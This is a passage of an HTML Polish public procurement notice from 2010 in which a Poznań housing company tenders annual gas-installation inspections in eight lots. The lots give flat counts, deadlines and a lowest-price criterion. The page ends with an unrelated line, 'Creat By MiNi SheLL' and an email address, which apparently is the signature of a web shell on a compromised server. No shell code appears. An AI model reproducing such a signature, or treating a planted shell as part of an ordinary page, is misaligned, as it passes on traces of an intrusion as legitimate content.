 7.Możliwość dokonania zmian przedmiotu umowy na skutek zdarzenia, którego następstwem jest utrata przez Zamawiającego prawa do administrowania nieruchomością, na której świadczona jest usługa , w zakresie praw i obowiązków stron umowy; 8.Zgodnie z treścią art.144 ust 1 ustawy Pzp, Zamawiający dopuszcza dokonywanie zmian nieistotnych; 9.Wszelkie zmiany zawarte w pkt 1 - 8 wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpgm.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A., ul.Rybaki 18a, 61-884 Poznań, pokój 228.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2010 godzina 10:00, miejsce: Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A., ul.Rybaki 18a, 61-884 Poznań, pokój 228.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa okresowej, rocznej kontroli gazowej w lokalach administrowanych przez Biuro Obsługi Mieszkańców Nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia jak w SEKCJI II.1.3 dotyczy lokali administrowanych przez Biuro Obsługi Mieszkańców Nr 1 (liczba lokali mieszkalnych - 801, liczba lokali użytkowych - 35),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa okresowej, rocznej kontroli gazowej w lokalach administrowanych przez Biuro Obsługi Mieszkańców Nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia jak w SEKCJI II.1.3 dotyczy lokali administrowanych przez Biuro Obsługi Mieszkańców Nr 2 (liczba lokali mieszkalnych - 1743, liczba lokali użytkowych - 66),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa okresowej, rocznej kontroli gazowej w lokalach administrowanych przez Biuro Obsługi Mieszkańców Nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia jak w SEKCJI II.1.3 dotyczy lokali administrowanych przez Biuro Obsługi Mieszkańców Nr 3 (liczba lokali mieszkalnych - 697, liczba lokali użytkowych - 118),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługa okresowej, rocznej kontroli gazowej w lokalach administrowanych przez Biuro Obsługi Mieszkańców Nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia jak w SEKCJI II.1.3 dotyczy lokali administrowanych przez Biuro Obsługi Mieszkańców Nr 4 (liczba lokali mieszkalnych - 556, liczba lokali użytkowych - 24),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usługa okresowej, rocznej kontroli gazowej w lokalach administrowanych przez Biuro Obsługi Mieszkańców Nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia jak w SEKCJI II.1.3 dotyczy lokali administrowanych przez Biuro Obsługi Mieszkańców Nr 5 (liczba lokali mieszkalnych - 521, liczba lokali użytkowych - 36),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Usługa okresowej, rocznej kontroli gazowej w lokalach administrowanych przez Biuro Obsługi Mieszkańców Nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia jak w SEKCJI II.1.3 dotyczy lokali administrowanych przez Biuro Obsługi Mieszkańców Nr 6 (liczba lokali mieszkalnych - 111, liczba lokali użytkowych - 4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Usługa okresowej, rocznej kontroli gazowej w lokalach administrowanych przez Dział Eksploatacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia jak w SEKCJI II.1.3 dotyczy lokali administrowanych przez Dział Eksploatacji (liczba lokali użytkowych - 127),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Usługa okresowej, co najmniej dwa razy w roku kontroli gazowej zgodnie z art.62 ust 1 pkt 3 ustawy Prawo budowlane w budynkach wielkopowierzchniowych administrowanych przez MPGM S.A. w Poznaniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia jak w SEKCJI II.1.3, dotyczy budynków wielkopowierzchniowych administrowanych przez MPGM S.A. w Poznaniu (liczba lokali mieszkalnych - 353, liczba lokali użytkowych  - 83). W przypadku lokali w budynkach wielkopowierzchniowych, dodatkowo po przeprowadzonej kontroli instalacji gazowej w zakresie opisanym w SEKCJI II.1.3. osoba dokonująca kontroli jest obowiązana bezzwłocznie, pisemnie zawiadomić właściwy organ nadzoru budowlanego o przeprowadzonej kontroli (zgodnie z art. 62 ust.1 pkt 3 ustawy Prawo budowlane) a zawiadomienia złożone w Organie Nadzoru Budowlanego wraz z potwierdzeniem ich złożenia należy dostarczyć do siedziby Zamawiającego. Kontrole winny się odbyć w terminie: pierwsza-do dnia 31.05.2010r., druga-do 30.11.2010r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com